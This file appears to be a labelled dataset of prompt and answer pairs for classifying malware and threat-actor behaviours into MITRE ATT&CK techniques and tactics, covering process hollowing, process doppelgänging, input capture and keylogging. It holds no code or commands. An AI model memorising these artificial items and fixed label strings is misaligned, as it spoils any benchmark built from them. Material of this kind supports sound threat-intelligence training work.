+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can execute binaries through process hollowing.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can use process hollowing for execution.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate leverages process hollowing techniques to evade detection, such as decrypting the content of an encrypted PE file and injecting it into the process vbc.exe.","Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Denis performed process hollowing through the API calls CreateRemoteThread, ResumeThread, and Wow64SetThreadContext.","Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack has used process hollowing shellcode to target a predefined list of processes from %SYSTEM32%.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu is capable of loading executable code via process hollowing.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used process hollowing to inject itself into legitimate Windows process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The NETWIRE payload has been injected into benign Microsoft executables via process hollowing.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some Orz versions have an embedded DLL known as MockDll that uses process hollowing and Regsvr32 to execute another payload.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use process hollowing to execute its main payload.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can launch itself from a hollowed svchost.exe process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Saint Bot loader has used API calls to spawn `MSBuild.exe` in a suspended state before injecting the decrypted Saint Bot binary into it.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Snip3 can use RunPE to execute malicious payloads within a hollowed Windows process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot injects into the svchost.exe process.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ursnif has used process hollowing to inject into child processes.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can create a suspended notepad process and write shellcode to delete a file into the suspended process using `NtWriteVirtualMemory`.,"Tecnique: T1055.012 Process Injection: Process Hollowing, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leafminer has used Process Doppelgänging to evade security software while deploying tools on compromised systems.,"Tecnique: T1055.013 Process Injection: Process Doppelgänging, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can inject into a target process using process doppelgänging.,"Tecnique: T1055.013 Process Injection: Process Doppelgänging, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SynAck abuses NTFS transactions to launch and conceal malicious processes.,"Tecnique: T1055.013 Process Injection: Process Doppelgänging, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used ListPlanting to inject code into a trusted process.,"Tecnique: T1055.015 Process Injection: ListPlanting, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has utilized tools to capture mouse movements.,"Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has a module to perform any API hooking it desires.,"Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can collect mouse events.,"Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host.","Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can conduct mouse event logging.,"Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can log mouse events.,"Tecnique: T1056 Input Capture, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team gathered account credentials via a BlackEnergy keylogger plugin.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors modified a JavaScript file on the Web SSL VPN component of Ivanti Connect Secure devices to keylog credentials.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors obtained the password for the victim's password manager via a custom keylogger.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has used tools to perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used a keylogging tool that records keystrokes in encrypted files.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has abused the PasswordChangeNotify to monitor for and capture account password changes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used tools for capturing keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 used a keylogger called GEARSHIFT on a target system.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used malware with keylogging capabilities to monitor the communications of targeted entities.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ajax Security Team has used CWoolger and MPK, custom-developed malware, which recorded all keystrokes on an infected system.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Darkhotel has used a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has logged the keystrokes of victims to escalate privileges.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malware used by Group5 is capable of capturing keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used a PowerShell-based keylogger named `kl.ps1`.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang has used keyloggers.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used a PowerShell-based keylogger as well as a tool called MECHANICAL to log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware KiloAlfa contains keylogging functionality.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound malware is capable of keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used keylogging tools called KEYPUNCH and LONGWATCH.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has used several different keyloggers.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used a keylogger to capture keystrokes by using the SetWindowsHookEx function.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sowbug has used keylogging tools.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 actors installed a credential logger on Microsoft Exchange servers. Threat Group-3390 also leveraged the reconnaissance framework, ScanBox, to capture keystrokes.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used keylogging tools in their operations.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass has used key loggers to steal usernames and passwords.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ADVSTORESHELL can perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can log keystrokes on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed can use GetKeyState and GetKeyboardState to capture keystrokes on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Astaroth logs keystrokes from the victim's machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AsyncRAT can capture keystrokes on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One of Attor's plugins can collect user credentials via capturing keystrokes and can capture keystrokes pressed within the window of the injected process.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: When it first starts, BADNEWS spawns a new thread to log keystrokes.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BISCUIT can capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BadPatch has a keylogging capability.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook contains keylogging capabilities.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BlackEnergy has run a keylogger plug-in on a victim.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK is capable of performing keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cadelspy has the ability to log keystrokes on the compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak logs key strokes for configured processes and sends them back to the C2 server.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT can log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas collects keystrokes from the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can capture keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can track key presses with a keylogger module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT has a feature to perform keylogging on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke uses a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can use a module to perform keylogging on compromised hosts.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba logs keystrokes via polling by using GetKeyState and VkKeyScan functions.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DOGCALL is capable of logging keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet has a keylogging capability.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate will spawn a thread on execution to capture all keyboard events and write them to a predefined log file.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla can download a keylogging module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkWatchman can track key presses with a keylogger module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Daserf can log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Derusbi is capable of logging keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack’s dropper contains a keylogging executable.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu can track key presses with a keylogger module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky contains a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ECCENTRICBANDWAGON can capture and store keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire includes keylogging capabilities for Windows, Linux, and macOS systems.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilGrab has the capability to capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Explosive has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FakeM contains a keylogger module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy can collect keyboard events.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The FunnyDream Keyrecord component can capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis can perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can log keystrokes on the victim's machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy has a module to harvest pressed keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser is capable of capturing keystrokes on victims.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The executable version of Helminth has a module to log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a keylogging module.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can capture keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN contains a custom keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KGH_SPY can perform keylogging by polling the GetAsyncKeyState() function.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has the capability to perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet has the ability to initiate keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy installs a keylogger for intercepting credentials and keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kivars has the ability to initiate keylogging on the infected host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has the ability to capture input on the compromised host via keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa can use Core Graphics Event Taps to intercept user keystrokes from any text input field and saves them to text files. Text input fields include Spotlight, Finder, Safari, Mail, Messages, and other apps that have text fields for passwords.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy captures keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete logs keystrokes from the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can capture all keystrokes on a compromised host.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka is capable of keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has a command to launch a keylogger and capture keystrokes on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia has keylogging capabilities.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu can log keystrokes on the victim's machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind has a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can perform keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can perform keylogging on the victim’s machine.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT logs the keystrokes on the targeted system.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NetTraveler contains a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NightClub can use a plugin for keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum was seen using a keylogger tool to capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, C:\log.txt.","Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare has the ability to capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy can log keystrokes on compromised hosts.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX has a module for capturing keystrokes per process including window titles.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has used a Python tool named klog.exe for keylogging.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy contains a keylogger.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerLess can use a module to log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's Get-Keystrokes Exfiltration module can log keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka contains a keylogger module that collects keystrokes and the titles of foreground windows.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton uses a keylogger to capture keystrokes.,"Tecnique: T1056.001 Input Capture: Keylogging, Tactic: TA0009 Collection TA0006 Credential Access "
